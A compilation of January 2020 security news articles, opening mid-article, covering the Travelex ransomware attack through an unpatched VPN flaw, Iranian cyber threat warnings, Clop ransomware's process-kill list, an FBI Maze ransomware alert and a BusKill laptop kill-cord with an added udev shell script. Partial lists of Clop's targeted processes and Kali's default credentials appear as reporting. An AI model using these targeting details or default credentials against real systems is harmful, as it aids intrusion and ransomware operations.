We were told that they deleted the backup files and that the ransom demanded was $3 million; if not paid in seven days (countdown likely started on December 31), the attackers said they will publish the data they stole.

Travelex left the door open
Details about how the intrusion occurred are not available at the moment but Travelex was running insecure services before the incident, which could explain how the attacker may have breached the network.

The company is using the Pulse Secure VPN enterprise solution for secure communication, which was patched last year against an "incredibly bad" vulnerability (CVE-2019-11510), as security researcher Kevin Beaumont describes it in a recent blog post.

On unpatched systems, the flaw "allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords)," Beaumont explains.

A public exploit for this has been available since August 21, 2019. Soon after, someone started scanning the internet for vulnerable endpoints.

Troy Mursch, chief research officer at Bad Packets, found about 15,000 systems that were directly exploitable via this security issue. Mursch then started to contact organizations at risk, warning them about the danger of leaving their systems unpatched.

Travelex was one of the companies Mursch alerted of the issue but he did not get a reply:

source: Bad Packets Report
Attackers typically spend significant time on the network before deploying the ransomware and encrypting files. This is to get familiar with the network and find systems with important data and backups, to increase their chances of getting paid.

Furthermore, Kevin Beaumont discovered that Travelex had Windows servers on its Amazon cloud platform that were exposed to the internet and did not have the Network Level Authentication feature enabled. This means that anyone could connect to the server before authenticating.

source: Kevin Beaumont
Update [06/01/2020, 18:26 EST]: Pulse Secure issued a statement today about ransomware actors exploiting unpatched VPN servers. The company is not validating any recent findings as it does not have any data about the attacks.

"As of now, we are unaware of receiving reports directly from customers about this derivative exploit – no firsthand evidence," Pulse Secure told BleepingComputer.

The current communication underlines that a patch for the software has been available since April 24, 2019, and that customers were informed multiple times about the fix via emails, in-product notifications, and the support website.

"Actors will take advantage of the vulnerability that was reported on Pulse Secure, Fortinet and Palo Alto VPN products – and in this case, exploit unpatched VPN servers to propagate malware, REvil (Sodinokibi), by distributing and activating the Ransomware through interactive prompts of the VPN interface to the users attempting to access resources through unpatched, vulnerable Pulse VPN servers." Scott Gordon (CISSP), Pulse Secure Chief Marketing Officer.

Since the release of the patch, support engineers have been available 24x7 for customers needing help to solve the problem, including those not under an active maintenance contract.


US Govt Says Iran's Cyberattacks Can Disrupt Critical Infrastructure
10.1.2020 
Bleepingcomputer  BigBrothers

The U.S. Department of Homeland Security (DHS) warned in a terrorism threat alert issued through the National Terrorism Advisory System (NTAS) that potential cyberattacks carried out by Iranian-backed actors against the U.S. have the potential to disrupt critical infrastructure.

The NTAS bulletin was issued to describe the current threat landscape following the strike that killed Iranian IRGC-Quds Force commander Maj. Gen. Qassim Suleimani on January 2, 2020, at the Baghdad airport in Iraq.

While DHS' NTAS alert says that there is "no information indicating a specific, credible threat to the Homeland" at this time, the DHS also adds that "an attack in the homeland may come with little or no warning."

"Iran and its partners, such as Hizballah, have demonstrated the intent and capability to conduct operations in the United States," with previous such efforts having "included, among other things, scouting and planning against infrastructure targets and cyber-enabled attacks against a range of U.S.-based targets."

The new @DHSgov NTAS Bulletin on the threat landscape was issued to inform & reassure the American public, state/local governments & private partners that DHS is actively monitoring & preparing for any specific, credible threat, should one arise.

— Acting Secretary Chad Wolf (@DHS_Wolf) January 4, 2020
"In times of heightened threats, organizations should increase monitoring, back up systems, implement multifactor authentication, & have an incident response plan ready," Acting Secretary Chad F. Wolf advises.

U.S. critical infrastructure is a target
"Iran maintains a robust cyber program and can execute cyberattacks against the United States," DHS's NTAS alert says.

"Iran is capable, at a minimum, of carrying out attacks with temporary disruptive effects against critical infrastructure in the United States."

While the NTAS alert doesn't mention what sectors could be targeted in such future attacks, the DHS website lists the following 16 critical infrastructure sectors as vital to the United States:

• Chemical Sector
• Commercial Facilities Sector
• Communications Sector
• Critical Manufacturing Sector
• Dams Sector
• Defense Industrial Base Sector
• Emergency Services Sector
• Energy Sector
• Financial Services Sector
• Food and Agriculture Sector
• Government Facilities Sector
• Healthcare and Public Health Sector
• Information Technology Sector
• Nuclear Reactors, Materials, and Waste Sector
• Transportation Systems Sector
• Water and Wastewater Systems Sector
As the DHS says, incapacitating or destroying targets from these infrastructure sectors "would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."

"Iran has shown previously to be opportunistic in its targeting of infrastructure with denial of service attacks against banks as well as trying to get access to industrial control systems in electric and water companies," Robert M. Lee, Dragos CEO and founder, said.

"While it is important to think where strategic targets would be for them it's just as relevant that they might search for those who are more insecure to be able to have an effect instead of a better effect on a harder target."

CISA warns of a potential wave of Iranian cyber-attacks
While Acting Secretary Wolf said in a statement that "at this time there is no specific, credible threat against the homeland," Christopher C. Krebs, Director of Cybersecurity and Infrastructure Security Agency, issued a warning about the possibility of Iranian cyber-attacks targeting U.S. assets.

"Bottom line: time to brush up on Iranian TTPs and pay close attention to your critical systems, particularly ICS," Krebs said. "Make sure you’re also watching third party accesses!"

CISA also alerted the public and private sector in June 2019 of an increase in Iranian-backed malicious cyber activity employing destructive wiper tools and targeting U.S. industries and government agencies.

Read my statement on Iranian cybersecurity threats below.

— Chris Krebs (@CISAKrebs) June 22, 2019
According to Krebs' statement published in June 2019 on Iranian cybersecurity threats, these attacks were being conducted utilizing common tactics such as credential stuffing, password spraying, and spear phishing.

"What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you've lost your whole network," CISA's Director said at the time.

"Iran has leveraged wiper malware in destructive attacks on several occasions in recent years," John Hultquist, FireEye Director of Intelligence Analysis also adds. "Though, for the most part, these incidents did not affect the most sensitive industrial control systems, they did result in serious disruptions to operations."


How to Stop Microsoft From Testing New Features in Edge
10.1.2020 
Bleepingcomputer  OS

The Chromium-based Edge will launch later this month and Microsoft has started sharing essential information about the browser, including how to disable various features in your environment.

Microsoft says the new Edge will be pushed via Windows Update to supported versions of Windows 10 and it replaces the existing Edge as the default web browser.

Once installed, Edge will use Microsoft's 'Experimentation and Configuration Service (ECS)' to request and receive different kinds of configurations, feature rollouts, and experiments.

In other words, the Experimentation and Configuration Service (ECS) allows Microsoft to turn on and test experimental Edge features, improvements and bug fixes without the user's knowledge or permission.

While ECS experiments aim to improve the browsing experience, they can also create problems for enterprises and administrators.

For example, in November Google used a similar concept to enable an experimental WebContent Occlusion feature that caused the browser to show a white screen for enterprise users. The experimental feature was rolled back after furious admins complained.

If you want to be on the safe side, you can disable Microsoft Edge's communication with the experimentation service by installing the Microsoft Edge group policies.

Disable A/B testing service in Microsoft Edge
1. Download and install the Microsoft Edge Policy file from the Microsoft Edge Enterprise site.
2. Once installed, open the Group Policy Editor via the Start menu or search.
3. In Group Policy Editor, under Computer Configuration, right-click on Administrative Templates and select Add/Remove Templates.
4. When the Add/Remove Templates window appears, click on Add, navigate to the C:\Windows\PolicyDefinitions\en-US folder and select msedge.adm as shown below. Then click on the Open button.
Add Microsoft Edge Template
5. Close the Add/Remove Templates window.
6. Now go to Computer Configuration -> Administrative Templates -> Classic Administrative Templates and then click on Microsoft Edge.
7. Look through the list of policies and double-click on the Control communication with the experimentation and configuration service option.
8. You can then select one of the following three configurations depending on what you wish to do: Retrieve configurations only, Retrieve configurations and experiments, or Disable communication with the service. Descriptions of what each setting does can be found here.
Configure Policy
9. Once you select the option you wish to use, you can close the Group Policy Editor and the policy will be configured.
Microsoft warns that disabling the communication with this service could affect the company's ability to patch bugs in the Edge browser.


BusKill Cable Starts a Self-Destruct Routine on Stolen Laptops
10.1.2020 
Bleepingcomputer  Safety

A USB cable and some scripting can save sensitive data on your laptop from grab-and-go thieving situations when working in a public place.

Linux system administrator and software engineer Michael Altfield designed a kill-cord called BusKill that can trigger a specific action when it gets disconnected from the laptop.

He came up with the idea after searching for a simple, low-tech solution to cause the computer to lock, shut down, or self-destruct when it is physically separated from the owner.

In essence, BusKill is a cable with a USB drive at one end, which plugs into your laptop, and a clip at the other end, which attaches to your body. When the drive disconnects, the system acts on a predefined 'udev' event, which can be anything from locking the computer or shutting it down to wiping the data on it.

Altfield spent about $20 to build BusKill but this depends on the quality of the items you choose. A USB drive, a magnetic adapter, a carabiner, and a USB extension cable are the hardware essentials.

source: Michael Altfield
Nothing needs to be stored on the USB drive, since only its presence is required for the kill cable to do its job, so it can be a cheap device as long as the system recognizes it.

A script that triggers the action is the software part. It can be restricted to fire only when one specific drive is removed, by matching on uniquely identifying properties of that drive (manufacturer, filesystem UUID, model).
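As an added example, not Altfield's own BusKill code or anything from the article, the following POSIX shell script generates a udev rule that fires only on the removal of one specific drive (matched on vendor id, model and filesystem UUID, all constructed sample values here), writes the handler that locks the screen or powers off, and includes a small check that confirms a different drive would be ignored. The handler path, rule file name and the use of systemd's loginctl/systemctl are assumptions.

```shell
#!/bin/sh
# Added example (not part of the BusKill project): udev rule + handler for a
# USB kill cord. Identifier values below are constructed; read the real ones
# from your drive with:  udevadm info --query=property --name=/dev/sdX1
# (look at ID_VENDOR_ID, ID_MODEL and ID_FS_UUID).
set -eu

# Constructed sample identifiers for the kill-cord drive (hypothetical).
BUSKILL_VENDOR_ID="0781"
BUSKILL_MODEL="Cruzer_Blade"
BUSKILL_FS_UUID="3A1F-7C2E"
# Assumed install location of the handler script.
BUSKILL_HANDLER="/usr/local/bin/buskill-handler.sh"

# Map a mode to the command the handler runs. "lock" asks systemd-logind to
# lock every session; "shutdown" powers the machine off. Both assume systemd.
buskill_command() {
    case "$1" in
        lock)     printf 'loginctl lock-sessions' ;;
        shutdown) printf 'systemctl poweroff' ;;
        *)        return 1 ;;
    esac
}

# Render the udev rule. It matches only remove events for block devices whose
# recorded properties equal all three identifiers, so unplugging any other
# drive does nothing. ENV{} values come from udev's database, so they are still
# readable on remove even though the hardware itself is already gone.
buskill_rule() {
    vendor="$1"; model="$2"; uuid="$3"; handler="$4"
    printf 'ACTION=="remove", SUBSYSTEM=="block", ENV{ID_VENDOR_ID}=="%s", ENV{ID_MODEL}=="%s", ENV{ID_FS_UUID}=="%s", RUN+="%s"\n' \
        "$vendor" "$model" "$uuid" "$handler"
}

# Render the handler body. udev runs RUN+= programs as root with a short time
# limit, so the handler logs one line, does one quick action and exits.
buskill_handler() {
    cmd=$(buskill_command "$1")
    printf '#!/bin/sh\n# Generated by the BusKill example; run by udev on cable pull.\nlogger -t buskill "kill cord removed, running: %s"\nexec %s\n' \
        "$cmd" "$cmd"
}

# Write rule and handler under a prefix ("" for the real root) and print the
# rule path. After installing, run: udevadm control --reload
buskill_install() {
    prefix="$1"; mode="$2"
    rule_path="$prefix/etc/udev/rules.d/99-buskill.rules"
    handler_path="$prefix$BUSKILL_HANDLER"
    mkdir -p "$(dirname "$rule_path")" "$(dirname "$handler_path")"
    buskill_handler "$mode" > "$handler_path"
    chmod 0755 "$handler_path"
    buskill_rule "$BUSKILL_VENDOR_ID" "$BUSKILL_MODEL" "$BUSKILL_FS_UUID" \
        "$BUSKILL_HANDLER" > "$rule_path"
    printf '%s\n' "$rule_path"
}

# Offline check of the matching logic: given KEY=VALUE properties of a remove
# event, print "fire" if the rule would run and "ignore" otherwise. Before
# trusting the cord, unplug a different drive and expect "ignore"; on the live
# system, "udevadm test --action=remove /sys/class/block/sdX1" shows the same.
buskill_would_fire() {
    vendor=""; model=""; uuid=""
    for kv in "$@"; do
        case "$kv" in
            ID_VENDOR_ID=*) vendor="${kv#*=}" ;;
            ID_MODEL=*)     model="${kv#*=}" ;;
            ID_FS_UUID=*)   uuid="${kv#*=}" ;;
        esac
    done
    if [ "$vendor" = "$BUSKILL_VENDOR_ID" ] && [ "$model" = "$BUSKILL_MODEL" ] \
        && [ "$uuid" = "$BUSKILL_FS_UUID" ]; then
        printf 'fire'
    else
        printf 'ignore'
    fi
}

# Usage: sudo sh buskill.sh install lock   (or: install shutdown)
if [ "${1:-}" = "install" ]; then
    buskill_install "" "${2:-lock}"
fi
```

Locking via loginctl only helps if the disk is encrypted and the screen locker is trusted; the shutdown mode is what makes a LUKS-encrypted laptop's data unreachable once the keys leave RAM.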

Below is a video showing BusKill in action:

The scenarios Altfield envisages for using BusKill involve working on your laptop in a public space and being logged into services that offer access to sensitive information, like online banking or the company VPN connection.

Altfield argues that despite taking precautions like two-factor authentication, VPN, or password managers, someone that steals your laptop after having authenticated is a plausible risk that some individuals should consider.

BusKill is not available for sale but Altfield provides all the details needed to build your own.

The project sparked a rich discussion on Reddit about how the scenarios envisaged by Altfield are not at all far-fetched and do happen in real life.

The community also came up with other solutions that would protect the data on the laptop. More elaborate ones would destroy the encrypted files on the storage drive when a specific password was entered, and then boot normally into the operating system.

Following these discussions, the Linux sysadmin is now thinking of writing a follow-up tutorial on expanding the BusKill capabilities to run a destructive wipe of the content in the computer memory and the LUKS (Linux Unified Key Setup) header instead of the entire encrypted disk.

This approach would make the process faster and more effective because the LUKS header contains the symmetric keys required for decrypting the entire disk. "Wiping the whole drive is unnecessary and would take too long," Altfield told BleepingComputer.


Kali Linux to Default to Non-Root User With 2020.1 Release
10.1.2020 
Bleepingcomputer  OS

The Kali Linux distribution is going to switch to a new security model by defaulting to a non-root user starting with the upcoming 2020.1 release.

This change will come with the release of the 2020.1 version scheduled for late January 2020, but users can already test it via the daily builds.

They will also be able to test it by downloading and running the weekly images released until Kali 2020.1 is officially available.

"New year is a good time for major changes, and in that spirit we would like to announce a major change in the Kali security model releasing in the upcoming 2020.1 release - Default Non-Root User," the Kali Linux team announced on Twitter.

Increased usage as primary OS, fewer tools requiring root
This move has been prompted by the increasing number of users that adopted Kali as a day to day operating system due to the Debian-Testing-based operating system's general stability.

"While we don’t encourage people to run Kali as their day to day operating system, over the last few years more and more users have started to do so (even if they are not using it to do penetration testing full time), including some members of the Kali development team," Kali team lead Jim O’Gorman said.

"When people do so, they obviously don’t run as default root user. With this usage over time, there is the obvious conclusion that default root user is no longer necessary and Kali will be better off moving to a more traditional security model."

Additionally, Kali's dev team based this move on the fact that, over the years, many of the security tools included with the distro no longer need root access to give users all of their features, and some even ship with defaults that prevent their use as the root user.

"Dropping this default root policy will thus simplify maintenance of Kali and will avoid problems for end-users," O’Gorman added.

These are some of the changes end users will notice once the non-root default is implemented:

• Kali in live mode will be running as user kali password kali. No more root/toor. (Get ready to set up your IDS filters, as we are sure this user/pass combo will be being scanned for by bots everywhere soon).
• On install, Kali will prompt you to create a non-root user that will have administrative privileges (due to its addition to the sudo group). This is the same process as other Linux distros you may be familiar with.
• Tools that we identify as needing root access, as well as common administrative functions such as starting/stopping services, will interactively ask for administrative privileges (at least when started from the Kali menu). If you really don’t care about security, and if you prefer the old model, you can install kali-grant-root and run dpkg-reconfigure kali-grant-root to configure password-less root rights.
"All that said, we are still not encouraging people to use Kali as their day to day operating system," O’Gorman further explains. "More than anything else, this is because we don’t test for that usage pattern and we don’t want the influx of bug reports that would come with it.

However, for those of you that are familiar with Kali and want to run it as your day to day platform, this change should help you out a lot. For the rest of you, this should give you a better security model to operate under while you are doing assessments."

Windows 10 undercover mode
Kali Linux also added an 'Undercover' mode with the release of 2019.4 during late November 2019 that can be used to instantly make the Kali desktop look almost identical to a Windows 10 one.

This works by enabling a custom Kali theme designed to look like Windows 10 to a casual viewer or someone glancing at your desktop in passing.

"Say you are working in a public place, hacking away, and you might not want the distinctive Kali dragon for everyone to see and wonder what it is you are doing. So, we made a little script that will change your Kali theme to look like a default Windows installation," Kali's devs said.

"That way, you can work a bit more incognito. After you are done and in a more private place, run the script again and you switch back to your Kali theme."

To enable the Undercover mode in Kali Linux 2019.4, you should perform these steps:

1. Open Terminal.
2. Type kali-undercover and press enter.
3. Undercover mode will be activated and your desktop will now look similar to Windows. You can now close the Terminal window.
4. Once you're done with the Undercover mode, you have to run the kali-undercover script again to switch back to your normal Kali theme.

The kali-undercover script can also be run using Kali's desktop search as shown in the GIF embedded above.


Linux Gamers Banned in Battlefield V if Using Wine and DXVK
10.1.2020 
Bleepingcomputer  IT

Linux users who are running Battlefield V under Wine with DXVK are being permanently banned from Electronic Arts' Battlefield V because the anti-cheat system is mistakenly detecting them as cheating.

Wine is an application that allows users to run Windows programs directly in Linux. To better run 3D games, users can install the DXVK package, which will create new Direct3D DLLs that utilize the Vulkan graphics API to render games in Wine.

According to a forum post at Lutris.net, Linux users are reporting that Electronic Arts' anti-cheat system for Battlefield V is detecting these DLLs as a game modification and triggering an automatic and permanent ban on their accounts.

"Good friends, finally after some time without being able to play Battlefield V for Linux, this week I was using lutris-4.21, I was having fun when my anti-cheat, FairFight, blew me out of the game, so I was banned. As I was not using any cheating, I think the anti-cheat considered dxvk or the table layer that used at the time as cheating, I sent an email to EA, is the alert."

When users contacted EA to explain that they were not cheating but rather using Linux with the DXVK package, they were told that the ban was "actioned correctly" and that they would not be removing the ban.

Response to banned users' support request
In particular, EA cited the following rules as being broken.

"Promote, encourage or take part in any activity involving hacking, cracking, phishing, taking advantage of exploits or cheats and/or distribution of counterfeit software and/or virtual currency/items"

The DXVK project page does state that using the DXVK Direct3D DLLs in multi-player games could be seen by anti-cheat systems as cheating and that users should use the DLLs at their own risk.

"Manipulation of Direct3D libraries in multi-player games may be considered cheating and can get your account banned. This may also apply to single-player games with an embedded or dedicated multiplayer portion. Use at your own risk."

Ultimately, these users were not trying to cheat, but simply play Battlefield V in the gaming environment of their choice with their paid-for license of the game.

Depriving users of their choice of gaming environments is a short-sighted decision by any game developer, especially as more people continue to move to Linux desktop environments.

BleepingComputer has reached out to Electronic Arts to see if they will resolve this issue, but has not heard back at this time.


Clop Ransomware Now Kills Windows 10 Apps and 3rd Party Tools
6.1.2020 
Bleepingcomputer  Ransomware

The Clop Ransomware continues to evolve with a new and integrated process killer that targets some interesting processes belonging to Windows 10 apps, text editors, programming IDEs and languages, and office applications.

When the Clop Ransomware started circulating in February 2019, it was just your normal garden variety CryptoMix ransomware variant with the same features we have been seeing in this family since 2017.

In March 2019, though, the Clop Ransomware suddenly changed and began disabling services for Microsoft Exchange, Microsoft SQL Server, MySQL, BackupExec, and other enterprise software. The ransom note had also changed to indicate that the attackers were targeting an entire network rather than individual PCs.

Clop Ransom Note
It was determined at that time that a threat actor group known as TA505 had adopted the Clop Ransomware as their final payload of choice after compromising a network, similar to how Ryuk, BitPaymer, and DoppelPaymer were being used.

This adoption by the threat actors has most likely fueled the ransomware's development as the actors change it to fit their needs when performing network-wide encryption.

Development continued in November 2019, when a new variant was released that attempted to disable Windows Defender running on local computers so that it would not be detected by future signature updates.

These changes also coincided with the threat actors' continued targeting of companies in the Netherlands and France.

Just last month, Maastricht University (UM) in the Netherlands was infected by the Clop Ransomware.

Clop now terminates 663 processes
In late December 2019, a new Clop variant was discovered by MalwareHunterTeam and reverse engineered by Vitali Kremez that improves its process-termination feature; Clop now terminates 663 Windows processes before encrypting files.

It is not uncommon for ransomware to terminate processes before encrypting files as the attackers want to disable security software and do not want any files to be open as it could prevent them from being encrypted.

This new variant takes it a step further by terminating a total of 663 processes, which include new Windows 10 apps, popular text editors, debuggers, programming languages, terminal programs, and programming IDE software.

Some of the more interesting processes that are terminated include the Android Debug Bridge, Notepad++, Everything, Tomcat, SnagIt, Bash, Visual Studio, Microsoft Office applications, programming languages such as Python and Ruby, the SecureCRT terminal application, the Windows calculator, and even the new Windows 10 Your Phone app.

ACROBAT.EXE
ADB.EXE
CODE.EXE
CALCULATOR.EXE
CREATIVE CLOUD.EXE
ECLIPSE.EXE
EVERYTHING.EXE
JENKINS.EXE
MEMCACHED.EXE
MICROSOFTEDGE.EXE
NOTEPAD++.EXE
POWERPNT.EXE
PYTHON.EXE
QEMU-GA.EXE
RUBY.EXE
SECURECRT.EXE
SKYPEAPP.EXE
SNAGIT32.EXE
TOMCAT7.EXE
UEDIT32.EXE
WINRAR.EXE
WINWORD.EXE
YOURPHONE.EXE
It is not known why some of these processes are terminated, especially ones like Calculator, Snagit, and SecureCRT, but it's possible the attackers want to encrypt configuration files used by some of these tools.

A full list of the terminated processes can be found in Kremez's GitHub repository.

In the past, the process termination functionality was performed by a Windows batch file. By embedding this functionality into the main executable, it further signifies active development by the group.

"This change signifies that the ransomware group decided to include the "process killer" in the main bot making it a more universal Swiss-army approach rather than relying on their external libraries like "av_block" for this purpose," Kremez told BleepingComputer in a conversation.

In addition to the new and large list of targeted processes, this Clop Ransomware variant also utilizes a new .Cl0p extension, rather than the .CIop or .Clop extensions used in previous versions.

As Clop continues to infect organizations, and reap large ransoms for doing so, we can expect to see its development to continue as the actors evolve their tactics.


Microsoft Products Reaching End of Life in 2020
6.1.2020 
Bleepingcomputer  IT

Several major Microsoft products will reach their end of support during 2020, with Office 2010, Visual Studio 2010, Windows 7, Windows Server 2008 (including 2008R2), and multiple Windows 10 versions including 1803 and 1903 being some of the most important ones.

For products that have reached their end of support, Microsoft stops providing bug fixes for issues that are discovered, security fixes for newly found vulnerabilities, or technical support.

Customers who still use end-of-support software are advised by Redmond to upgrade as soon as possible to the latest on-premise or cloud version to keep their systems secure and bug-free.

The Extended Security Update program
However, as Microsoft says on its support website, "For customers requiring more time to move to the latest product, the Extended Security Update (ESU) program is available for certain legacy products as a last resort option.

The ESU program provides security updates only for up to 3 years, after the End of Support date. Contact your account manager, partner or device manufacturer for more information."

A list of some of the most prominent Microsoft software products reaching end of support this year and links to more details for each of them is available in the table below:

Product                                        End of Support date
SQL Server 2008 and 2008 R2*                   07/09/19
Windows Server 2008 and 2008 R2*               01/14/20
Exchange Server 2010                           01/14/20
Windows 7*                                     01/14/20
Windows 7 Professional for Embedded Systems*   01/14/20
Office 2010 client                             10/13/20
SharePoint Server 2010                         10/13/20
Project Server 2010                            10/13/20
Windows Embedded Standard 7*                   10/13/20
The products marked with asterisks are eligible for Microsoft's Extended Security Update Program.

End of support Modern Policy and Fixed Policy products
"Modern Lifecycle Policy covers products and services that are serviced and supported continuously," according to Redmond's support site, with the company providing a minimum of 12 months' notification before ending support if no replacement product or service is available.

These are the most important products covered by a Modern Lifecycle Policy that will be retired in 2020.

Products (Modern Policy)                                                                Retirement
Azure Container Service                                                                 January 31, 2020
Windows Analytics                                                                       January 31, 2020
Windows 10, version 1709 (Enterprise, Education, IoT Enterprise)                        April 14, 2020
Windows 10, version 1809 (Home, Pro, Pro for Workstation, IoT Core)                     April 14, 2020
Windows Server version 1809 (Datacenter Core, Standard Core)                            April 14, 2020
Windows 10, version 1803 (Enterprise, Education, IoT Enterprise)                        November 10, 2020
Windows 10, version 1903 (Enterprise, Home, Pro, Pro for Workstations, IoT Enterprise)  December 8, 2020
Windows Server, version 1903 (Datacenter, Standard, IoT Enterprise)                     December 8, 2020
According to Microsoft, a very long list of products governed by the company's Fixed Policy will also reach their end of support in 2020.

"Fixed Lifecycle Policy applies to many products currently available through retail purchase or volume licensing," says Microsoft.

This policy provides customers with at least 10 years of support (a minimum of 5 years of Mainstream Support followed by 5 years of Extended Support), with some exceptions.

Below, you can find a list of some of the most significant Microsoft products with a Fixed Policy reaching end of life this year.

Product (Fixed Policy)                           End of Support
Hyper-V Server 2008                              January 14, 2020
Hyper-V Server 2008 R2                           January 14, 2020
Windows 7                                        January 14, 2020
Windows Server 2008 R2                           January 14, 2020
Windows Server 2008                              January 14, 2020
Internet Explorer 10                             January 31, 2020
Visual Studio Team Foundation Server 2010        July 14, 2020
Visual Studio 2010 (all editions)                July 14, 2020
System Center Service Manager 2010               September 8, 2020
Access 2010                                      October 13, 2020
Excel 2010                                       October 13, 2020
Excel Home and Student 2010                      October 13, 2020
Office 2010 (all editions)                       October 13, 2020
Project Server 2010                              October 13, 2020
SharePoint Foundation 2010                       October 13, 2020
SharePoint Server 2010                           October 13, 2020
SharePoint Server 2010 Service Pack 2            October 13, 2020
System Center Data Protection Manager 2010       October 13, 2020
Word 2010                                        October 13, 2020
Office Home & Business 2016 for Mac              October 13, 2020
Office Home & Student 2016 for Mac               October 13, 2020
Office Standard 2016 for Mac                     October 13, 2020

Products moving to Extended Support
Besides the long list of products being retired, there are also many of them that will move to Extended Support from Mainstream Support in 2020.

"Extended Support lasts for a minimum of 5 years and includes security updates at no cost, and paid non-security updates and support," says Microsoft.

"Additionally, Microsoft will not accept requests for design changes or new features during the Extended Support phase."

A list of some of the more important software products moving into Extended Support is available in the table embedded below.

Product                                          End of Mainstream Support
Cloud Platform System                            April 14, 2020
Exchange Server 2010 (all editions)              October 13, 2020
Exchange Server 2016 (Enterprise, Standard)      October 13, 2020
Office Home and Business 2016                    October 13, 2020
Office Home and Student 2016                     October 13, 2020
Office Professional 2016                         October 13, 2020
Office Professional Plus 2016                    October 13, 2020
Office Standard 2016                             October 13, 2020
Skype for Business 2016                          October 13, 2020
Visio Professional 2016                          October 13, 2020
Visio Standard 2016                              October 13, 2020
Visual Studio 2015 (all editions)                October 13, 2020
Visual Studio 2015 Update 3                      October 13, 2020
Windows 10 Enterprise 2015 LTSB                  October 13, 2020
Windows 10 IoT Enterprise 2015 LTSB              October 13, 2020
Windows Defender Antivirus for Windows 10        October 13, 2020
Windows Defender Exploit Guard                   October 13, 2020
Microsoft provides a full list of all the products that will be reaching the end of support or will be retiring in 2020, as well as a list of all products and their lifecycle policy timelines in the Lifecycle Product Database.

A complete list of end of support deadlines and related migration information for all Microsoft products is available on the Search product lifecycle page.


FBI Warns of Maze Ransomware Focusing on U.S. Companies
6.1.2020 
Bleepingcomputer  BigBrothers  Ransomware

Organizations in the private sector received an alert from the F.B.I. about operators of the Maze ransomware focusing on companies in the U.S. to encrypt information on their systems after stealing it first.

The warning came less than a week after the Bureau warned about the LockerGoga and MegaCortex ransomware threats infecting corporate systems.

The many tricks of Maze ransomware
On December 23, the F.B.I. shared with private businesses a Flash Alert seen by BleepingComputer to increase awareness about Maze ransomware's increased targeting of institutions in the U.S.

The warning is marked TLP: Green, meaning that it is not shareable via public distribution channels, and contains technical details to help organizations avoid falling victim to this threat.

Maze has been operating since early 2019 at a global level but the "FBI first observed Maze ransomware activity against US victims in November 2019."

Following a network breach, the threat actor first exfiltrates, or steals, company files before encrypting computers and network shares. The actors then demand a victim-specific ransom in exchange for the decryption key.

The stolen data serves as leverage to force victims to pay the ransom, under the promise that it would be destroyed once the attackers get the money.

Maze operators in the past have released data from victims that did not pay them. Two recent examples are the City of Pensacola and Southwire, a manufacturer of cables and wires.

According to the F.B.I. alert, the threat actors behind Maze ransomware use several methods to breach a network, which include fake cryptocurrency sites and malspam campaigns that impersonate government agencies and security vendors.

The malware was also seen distributed by exploit kits, Fallout in May 2019 and Spelevo in October 2019, exploiting unpatched vulnerabilities in Internet Explorer and Adobe Flash (CVE-2018-8174, CVE-2018-15982, and CVE-2018-4878).

"As of late November 2019, malicious cyber actors posing as government agencies or security vendors deployed Maze through phishing emails containing a macro-enabled Word document attachment. When the embedded macro was executed, Maze was downloaded and executed to infect the victim machine" - Federal Bureau of Investigation

The F.B.I. does not recommend paying the ransom since this action does not guarantee the recovery of the encrypted files or the destruction of the stolen data; it would only encourage the threat actors to attack other organizations.

FBI wants the IoCs from victims
Providing indicators of compromise (IoCs) from cyber attacks as soon as possible can help law enforcement in ongoing investigations. The name of the victim is not required in such cases, but time is of the essence: IoCs should be reported as soon as possible because their value to the investigation decreases quickly.

The agency encourages victims to contact local field offices immediately after the discovery of a ransomware incident and provide the following information:

• Recovered executable file
• Copies of the file or other documents suspected to be related to Maze
• Complete phishing email file with headers
• Live memory (RAM) capture
• Images of infected systems
• Malware samples
• Network and Host-Based Log files
• Email addresses of the attackers
• A copy of the ransom note
• Ransom amount and whether or not the ransom was paid
• Bitcoin wallets used by the attackers
• Bitcoin wallets used to pay the ransom (if applicable)
• Tor sites used to contact the attackers
• Names of any other malware identified on your system
• Copies of any communications with attackers
• Document use of the domains used for communication
• Identification of website or forum where data was leaked
Recommended mitigations
Organizations can lower the chances of falling victim to a ransomware attack by keeping software up to date, using multi-factor authentication and strong passwords, and by segregating the more important systems from the rest of the network.

Furthermore, recovering from ransomware is easier and less expensive when a proper routine exists for creating offline backups and the integrity of that process is constantly under scrutiny.

If the attack already happened, the F.B.I. recommends the following mitigation steps:

• Execute a network-wide password reset
• Scan system backups for registry persistence
• Scan system backups for other malware infections, particularly IcedID banking Trojan, Trickbot, and/or Emotet
• Audit logs for unexpected network traffic and mitigate as needed


U.S. Government Issues Warning About Possible Iranian Cyberattacks
6.1.2020 
Bleepingcomputer  BigBrothers

Christopher C. Krebs, Director of Cybersecurity and Infrastructure Security Agency issued a warning about a potential new wave of Iranian cyber-attacks targeting U.S. assets after Maj. Gen. Qassim Suleimani was killed by a U.S. airstrike at the Baghdad airport in Iraq.

"Given recent developments, re-upping our statement from the summer," Krebs said in a rare warning on Twitter.

"Bottom line: time to brush up on Iranian TTPs and pay close attention to your critical systems, particularly ICS," he added. "Make sure you’re also watching third party accesses!"

"The Department of Homeland Security stands ready to confront and combat any and all threats facing our homeland," Acting Secretary Chad F. Wolf also said today in a statement.

"While there are currently no specific, credible threats against our homeland, DHS continues to monitor the situation and work with our Federal, State and local partners to ensure the safety of every American."

Given recent developments, re-upping our statement from the summer.

Bottom line: time to brush up on Iranian TTPs and pay close attention to your critical systems, particularly ICS. Make sure you’re also watching third party accesses! https://t.co/4G1P0WvjhS

— Chris Krebs (@CISAKrebs) January 3, 2020
Statement on June 2019 data wiper attacks
CISA also warned in June 2019 of an increase in cyberattacks utilizing destructive wiper tools targeting U.S. industries and government agencies by Iranian actors or proxies.

According to Krebs' June statement on Iranian cybersecurity threats also published on Twitter, these attacks were conducted using common tactics such as credential stuffing, spear phishing, and password spraying.

"What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you've lost your whole network," CISA's Director said.

While Krebs' statement did not point to any specific attack, previous attacks that utilized wiper malware show the amount of damage they can lead to:

In 2012, Shamoon was used as a political protest against Saudi Arabia, leading to the destruction of data on more than 30,000 computers.
In 2017, the NotPetya wiper used the EternalBlue exploit to infect vulnerable systems.
Again in 2017, another anti-Israel & pro-Palestinian data wiper dubbed IsraBye pretended to be ransomware.
